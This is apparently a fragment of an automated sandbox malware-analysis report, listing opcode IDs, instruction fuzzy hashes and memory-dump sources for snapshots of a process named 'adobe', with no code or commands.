                                    • Instruction Fuzzy Hash: B34160B6E1010D8FDB44EBA4C9816EFBBB6FB88304F108069E615F7244DB385D01CBA1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c8547c73c5a2854dfb76251fe35fd35c6c66322b68c914001edf8416172c7039
                                    • Instruction ID: f114814dd7f2b792f533acd7a7b098a8fad7912346f724560b862345766b510e
                                    • Opcode Fuzzy Hash: c8547c73c5a2854dfb76251fe35fd35c6c66322b68c914001edf8416172c7039
                                    • Instruction Fuzzy Hash: 39313BB6900208DFCB10DFA9D984A9EBFF5EF48310F14842AE509E7211D7359955CFA5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b422b7e39add6ff4505df35661aead0b2d3aab7ce04f849c697a1b39c63831cd
                                    • Instruction ID: 628ca3682a2d5568eff68d1562456196876e68dbe1e547af742e37d5690b2898
                                    • Opcode Fuzzy Hash: b422b7e39add6ff4505df35661aead0b2d3aab7ce04f849c697a1b39c63831cd
                                    • Instruction Fuzzy Hash: 483150B5A1010D8FDB44EFA4C985AAFBBB6FB8C318F108029E615B7344CB345D01CBA1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5b49ab2d26cf0b2e6fb8af462f00cdb92df30f48637158932a69f2fb4dd24945
                                    • Instruction ID: e6dcb6853e6c3e311acef7904dbef0a9b3c011c9df41f23babe01a1c57a45b01
                                    • Opcode Fuzzy Hash: 5b49ab2d26cf0b2e6fb8af462f00cdb92df30f48637158932a69f2fb4dd24945
                                    • Instruction Fuzzy Hash: 764112B2E012489FDB14DFE9D984BDEBBF5AF48310F24802AE415A7250DB78A845CB91
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f8887f6700a250f7d8398a261ed12812b57bc675cace080d08884bfff55c44e8
                                    • Instruction ID: 37cadf36c444beae39e12e6d4dabd0eae01875fb3523da184771a5c1d4e9b226
                                    • Opcode Fuzzy Hash: f8887f6700a250f7d8398a261ed12812b57bc675cace080d08884bfff55c44e8
                                    • Instruction Fuzzy Hash: EB3104B2D002489FDB14CFD9D994BDEBBF5AF48304F24802AE415E7290DB789985CF55
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e0dd5ec96d36298cecccf06c4a45a55376183da9ed849cb5850a3d2b0c39a826
                                    • Instruction ID: 016fbb8e59703215f2ec8487c29023adb673acd97681bd738a5851e1eb5061a1
                                    • Opcode Fuzzy Hash: e0dd5ec96d36298cecccf06c4a45a55376183da9ed849cb5850a3d2b0c39a826
                                    • Instruction Fuzzy Hash: B111F0B6E003554FCB11DE7898546FF7BF6EFC9220B14852AD494D7241EB388C0983A1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1892969468.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_120d000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 85ed4012dcebdf973821b085aa7eafcc077afdd4dd12f036ebc6eeb4844b2366
                                    • Instruction ID: 04ed3d2e0d9610d89630e989ae2092bc3d42270bf54a516febc8430726a47a84
                                    • Opcode Fuzzy Hash: 85ed4012dcebdf973821b085aa7eafcc077afdd4dd12f036ebc6eeb4844b2366
                                    • Instruction Fuzzy Hash: E5212271515308DFCB02DF98C5C0B26BBA5FB84324F20C66DE9094B297C376D846CA61
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1892969468.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_120d000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ab09bd84a3070412cc93207f7ce2926baad3edb39fc0276c5ff8cf89c3dfdcb5
                                    • Instruction ID: fdafdcd93b89ed442bc49c743cc469379ee0eb5a28138a2eb2fa94ebab0765e8
                                    • Opcode Fuzzy Hash: ab09bd84a3070412cc93207f7ce2926baad3edb39fc0276c5ff8cf89c3dfdcb5
                                    • Instruction Fuzzy Hash: 78212271510208DFCB02DF98D5C4B26BBA5EB84314F20C66DE9094B297C37AE846CA61
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7ff0b8af7ce3721d8984465f2b69e076f548695c490a200eec5fe4dbc0f43257
                                    • Instruction ID: 4acd7fcfdb1ca04e179c509290cca7de9d11baea83d9f9df2b400709e50f98fb
                                    • Opcode Fuzzy Hash: 7ff0b8af7ce3721d8984465f2b69e076f548695c490a200eec5fe4dbc0f43257
                                    • Instruction Fuzzy Hash: 1F213A71B4D3488FC7159B24D9117AA3B76FF86200F64C09BD102CB6A6DE3A9C06CB83
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1b91ec5464caf303f13d7ad63a2b446baa02119765c45435a9043a09e92bc5c5
                                    • Instruction ID: 65dfb3e95534cc8354fd2523f0641e4df7336acea706bc83c420ad90546a621a
                                    • Opcode Fuzzy Hash: 1b91ec5464caf303f13d7ad63a2b446baa02119765c45435a9043a09e92bc5c5
                                    • Instruction Fuzzy Hash: 7B31F2B1D01218DFEB20DF99C588B8EBFF5EB08314F24841AE444BB250C7B99889CF95
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2be2f3e871f9913280a7020dcf9703ca622cbcbec6399503008e5bab061c89cf
                                    • Instruction ID: 28678ee58ae6e4cfc7cf32ee2ab65a6ef2bddc4ad0a45ebddf5aa3e5cee88bfe
                                    • Opcode Fuzzy Hash: 2be2f3e871f9913280a7020dcf9703ca622cbcbec6399503008e5bab061c89cf
                                    • Instruction Fuzzy Hash: C821E0B5D04218DFEB20DF99D589BCDBBF1BB08314F24841AE444AB250C7B99889CF95
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 31fbe7fb6da1716f614f5b6cb1f1a66d27f38767cf8ea2bc58c5a3f1763610c6
                                    • Instruction ID: 82ea9c06e0a0bfa0faa47adfc3b80511c5bb8bfe2deaac715f403d5ce5dc7b2b
                                    • Opcode Fuzzy Hash: 31fbe7fb6da1716f614f5b6cb1f1a66d27f38767cf8ea2bc58c5a3f1763610c6
                                    • Instruction Fuzzy Hash: 5F11C1B1B083849FDB06DB74891A9AD3FF4AE5210071404EAD845C7253E9399D06C712
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3c7c4d7010d281f3e5286a1c72a13c8a124b33e120154eae2ce3ba69ade987a9
                                    • Instruction ID: f7a89ed5627dc36c00c8402223c5ac42040b830a45db3a5cb378c79617389c2d
                                    • Opcode Fuzzy Hash: 3c7c4d7010d281f3e5286a1c72a13c8a124b33e120154eae2ce3ba69ade987a9
                                    • Instruction Fuzzy Hash: 9F1161B69093458FDB06DF7498161E97FF0FE0621471841EBD485EB153F23A861BC752
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0919ab3da56692b0bc2dabbb1c1371632df4e4b72327b158ec6a15c09c433327
                                    • Instruction ID: 95b54f446f2e2f9a3f923be8b17ffff29d390d1a598e2358b064cbfb4dfe3822
                                    • Opcode Fuzzy Hash: 0919ab3da56692b0bc2dabbb1c1371632df4e4b72327b158ec6a15c09c433327
                                    • Instruction Fuzzy Hash: 3A21D3B6D042499FCB10CF9AD884ADEBBF5FB48310F108429E959A7211C379A954CFA5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1892969468.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_120d000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction ID: aa08937ac7470b36fc049ccded0bda8392dc3ef160c717bb4083f49e67a3379b
                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction Fuzzy Hash: D411BB75504284CFDB02CF98D5C4B55BFA1FB84318F24C6AAD9494B697C33AE44ACB62
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1892969468.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_120d000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction ID: 24b69125a83be575bb1789135c0d2e81fb6f0681c3ed63c14ca91e53dd3c67a0
                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                    • Instruction Fuzzy Hash: 3811DD75505284CFDB02CF94C5C4B15BFA1FB84328F24C6AAD9494B697C33AD80ACBA1
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a5e29ef56075718210e5a2cc1f2fe0cec4e4c367d16f39b602f28f057472fd42
                                    • Instruction ID: 0cdf45e0dd566c002e3668790d5f5cfe8b1f0bda546ec5d70200b91fb53c3d30
                                    • Opcode Fuzzy Hash: a5e29ef56075718210e5a2cc1f2fe0cec4e4c367d16f39b602f28f057472fd42
                                    • Instruction Fuzzy Hash: 370124243292884BC3467338D85575B3FA2EBCB254F88406AF945C73D9CE2C8C06C351
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e3c144e1ce0e359415b1f404a9b8bbb5ca311f5d101e1eb6977b0903ac9d00bd
                                    • Instruction ID: 79d2f422d0f05f6d00f4a540591ee7ac7ea2a52d718b56b7ef2e22a2b0887b46
                                    • Opcode Fuzzy Hash: e3c144e1ce0e359415b1f404a9b8bbb5ca311f5d101e1eb6977b0903ac9d00bd
                                    • Instruction Fuzzy Hash: 3E014C76F486048FD3589B04C901BA93762FB85211FA4C059D116CF7A9CA3D9C02CB83
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1892659926.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_11fd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 81577ed72f585b3ef4aa3cb40c3d4cac55e285121ddc7dc8d0ba2509dc5fc429
                                    • Instruction ID: 2d50471e36b1ba836775e94f8130bac5ec9fc63d4e85229824f9fecadde88efa
                                    • Opcode Fuzzy Hash: 81577ed72f585b3ef4aa3cb40c3d4cac55e285121ddc7dc8d0ba2509dc5fc429
                                    • Instruction Fuzzy Hash: D101AC310087849AEB195A99DD84777BF98EF41328F18C66DEE094E156C779D840C672
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: de731b573834ace85f7b84a628a4c927049258246612b10337445885cc9b042f
                                    • Instruction ID: 3edb90086d416d384fc8b4aac88514f8b7b005092de5dd93143042c8dc01524b
                                    • Opcode Fuzzy Hash: de731b573834ace85f7b84a628a4c927049258246612b10337445885cc9b042f
                                    • Instruction Fuzzy Hash: 04014472D05209CBDB04CFA6C5057EEFBBFAB89300F00D465941967342DBB85945CF91
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 115b704bae3bf128a3f938d881ba408ea6c5bdb9a4629e4a8ef42c4f06a3d194
                                    • Instruction ID: 7f8acc527f77d9bfa2edde03cc93854d9e9ad591f4e2e51dcaefe9f97a505f53
                                    • Opcode Fuzzy Hash: 115b704bae3bf128a3f938d881ba408ea6c5bdb9a4629e4a8ef42c4f06a3d194
                                    • Instruction Fuzzy Hash: BF012CB6E05209CBDB08CFA5C5057AEFBBEAB89300F00D466941967342DBB84945CF81
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c4a7cda942ffcd08fb13a47e794b0b19e5cc325d7f7b0ca581ab0633c328e1b4
                                    • Instruction ID: 54590bfde877864aba859d04c092dcaf3c834524a55c0fd0b66d18082483a0ac
                                    • Opcode Fuzzy Hash: c4a7cda942ffcd08fb13a47e794b0b19e5cc325d7f7b0ca581ab0633c328e1b4
                                    • Instruction Fuzzy Hash: B7F062B7E0915ECBCF10CF94E6805FDB3BABF09212F106431E005E2213D7789A018B22
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1892659926.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_11fd000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 643c4d128ee0bc7839ede02ed949b67bc7639235b5a58506eeeed5c5a4f2e827
                                    • Instruction ID: ca5a628514317a48e2ca2d5facae5945985a6eda88b555115f76d6d14d174689
                                    • Opcode Fuzzy Hash: 643c4d128ee0bc7839ede02ed949b67bc7639235b5a58506eeeed5c5a4f2e827
                                    • Instruction Fuzzy Hash: C3F068714047849AEB158A19D984767FF98EF41738F18C55AED094F286C3759844CA71
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8f7ca3ad4b41b7f9fd2477f549b25004ee5dc6cc112288ce03e5afb3b5a4d714
                                    • Instruction ID: 6d27a16bf925fc419233fc59fc43042975e7ddc8f56c31223e55fd74f54bf750
                                    • Opcode Fuzzy Hash: 8f7ca3ad4b41b7f9fd2477f549b25004ee5dc6cc112288ce03e5afb3b5a4d714
                                    • Instruction Fuzzy Hash: 4401FBF1C00219DFDB18DF6AC4083EEBAF5BF48350F108225E465AA294D7784A48CF91
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ed47f2058c58f5a9231c7ea760792a37c3199ac93cfc5a773c26114c8670f9a5
                                    • Instruction ID: 772094b62b47a815a3bc9f2dbe9b07ab526587bc1bc909a20f3839be72b1d98d
                                    • Opcode Fuzzy Hash: ed47f2058c58f5a9231c7ea760792a37c3199ac93cfc5a773c26114c8670f9a5
                                    • Instruction Fuzzy Hash: 3CF0E27872010C8BC3487B68E55862F77A7EBC9658B504039B906C779CCE788C01C390
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 359f6b4000e49ba73cfc05cdfe9ad7e26d89c09b2a092c4b7196797fa0c296f7
                                    • Instruction ID: be9cbb6364232f7fa4c276294f3056437f8699f4bdafc8c4405217be3f427ae6
                                    • Opcode Fuzzy Hash: 359f6b4000e49ba73cfc05cdfe9ad7e26d89c09b2a092c4b7196797fa0c296f7
                                    • Instruction Fuzzy Hash: 2301FBF2C00219DFDB18DF69C5043EE7AF1BF48311F148625E465EA2A4D3784A48CF91
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0618bae65ab480fd08c1bb254cd8b00bad7a2ca78a31332a9356ad26129572d7
                                    • Instruction ID: 15c3e8a48b3207c06a543098f7737affd32815f1be60e4140f4905e64366bbf9
                                    • Opcode Fuzzy Hash: 0618bae65ab480fd08c1bb254cd8b00bad7a2ca78a31332a9356ad26129572d7
                                    • Instruction Fuzzy Hash: 5FF02732204144AFCF09CF58D991D9E7FB6EF09204B1880ABE489CB226D736E913C715
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1b8d18fa4d16ce1f3e85f27349ff29f8128581e08d9aba7db8ee1ec62e67bc02
                                    • Instruction ID: 0998a67c5f1055cf62141f222d5a39c6510e647c205cea732240df5c0fea49dd
                                    • Opcode Fuzzy Hash: 1b8d18fa4d16ce1f3e85f27349ff29f8128581e08d9aba7db8ee1ec62e67bc02
                                    • Instruction Fuzzy Hash: DCE039B67041286F93049A6ED884C6BBBEEFBCC664311807AE508C7310DA319C00C6A0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a83093932871c33ddd74237277d9f1208c0594bd289aae6d28caa3b16bd48767
                                    • Instruction ID: e3d7fa692c0d91b48ab5f350fb0cf5650b4a4dd150fce2a281a7ffd55679acd1
                                    • Opcode Fuzzy Hash: a83093932871c33ddd74237277d9f1208c0594bd289aae6d28caa3b16bd48767
                                    • Instruction Fuzzy Hash: 06E0EDB6B041245F9304DBAED884D7BB7EEFBCC665315817AE51CD7354DA319C01C6A0
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d3f958c447ff136ab69e04181535362a67fa62172c328442969003fef3e24686
                                    • Instruction ID: 5770abb2a17d53674c614a0da138919831abfd450856baecd3d572fbb886652f
                                    • Opcode Fuzzy Hash: d3f958c447ff136ab69e04181535362a67fa62172c328442969003fef3e24686
                                    • Instruction Fuzzy Hash: 34F0553D7202099BD710E668EB4832B77EEE744788F004424A906DB788DF2DCC004BE2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6175d14bd29ca8487f3fa5fbb033da57fb52cc014fa0f5f734d07f64622efd7a
                                    • Instruction ID: 8da2005bdc522c6709ce8bd43b5e8451367a4a4e2c210913a63e22721093a5e3
                                    • Opcode Fuzzy Hash: 6175d14bd29ca8487f3fa5fbb033da57fb52cc014fa0f5f734d07f64622efd7a
                                    • Instruction Fuzzy Hash: 33E02B3D7201099BD710E568E75876B73EEE744788F404820A506DB788DF29CC004BE2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 083b362934084f2a79e96a38bc70085c781a6915fe0bad369d1868bed0b17944
                                    • Instruction ID: 29f6b85ca18afad722ec01241cd993ab347169c0247b6ce73be2a2705d6b0bda
                                    • Opcode Fuzzy Hash: 083b362934084f2a79e96a38bc70085c781a6915fe0bad369d1868bed0b17944
                                    • Instruction Fuzzy Hash: 29E0D87300D3949FD302AF1C99A53C77F929F52200F548857D9C446156D38C846AD257
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2cd91ff4f1fc5bfe63f3eda922473ff664aff761deeb809da7ef3fc621712948
                                    • Instruction ID: 56843b15232477f7d75088840b03688e7f41860de2eedf483bec7e7326d62945
                                    • Opcode Fuzzy Hash: 2cd91ff4f1fc5bfe63f3eda922473ff664aff761deeb809da7ef3fc621712948
                                    • Instruction Fuzzy Hash: EBE0C27294C3C9DEC7028BA495115997FB1EF4720475800CFD4848F022E9370D1B9796
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 259a07925df986d070966bdf98d48a5d477a1e0725c1d6bb49048e4bb26faf04
                                    • Instruction ID: aaeaede4e7b450adb4c6c9908fd15dd29ca96e1715cb60f6c41db6cb72c4d571
                                    • Opcode Fuzzy Hash: 259a07925df986d070966bdf98d48a5d477a1e0725c1d6bb49048e4bb26faf04
                                    • Instruction Fuzzy Hash: 0CE0EC7684E349CFCB00CBA0C0489ACBBBEAF0B350B019481D45A9B253C7BC9844CA15
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b390284f2e47ec62665e73c58207963917755839b6b0144a1aa0ce46999b3c89
                                    • Instruction ID: 68fe87902293d24a8aed86d6c77d5b84b8098828a2f9d2c53020b75563fd1c29
                                    • Opcode Fuzzy Hash: b390284f2e47ec62665e73c58207963917755839b6b0144a1aa0ce46999b3c89
                                    • Instruction Fuzzy Hash: 21D05E3560C3815FD246DE0488508A6BBB2EBD6204B14C88BEC908B762CB2ADD0BC761
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 68d4a67132bce6f9929471afa6e6e98aaefb1e110e440e5bdcd960a177bc8631
                                    • Instruction ID: 5d326322acbffc809871b0b8e3dd87d61518e02235dfcfb6d108905483866bbd
                                    • Opcode Fuzzy Hash: 68d4a67132bce6f9929471afa6e6e98aaefb1e110e440e5bdcd960a177bc8631
                                    • Instruction Fuzzy Hash: CBE01775D1520CEFCB80EFB8E44A69CBFF4AB04201F1080AAE809A3350EA745A80CF41
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                                    • Instruction ID: 047e0bf670754e0f11a65e250fdf2b3b00e8f9d7e7768edbffe34a4605cdb7f8
                                    • Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                                    • Instruction Fuzzy Hash: 70D067BBD4E209CBCB04CBA1C5449A8F77EBB4A351B11A555985A6B202C6F89444CA42
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
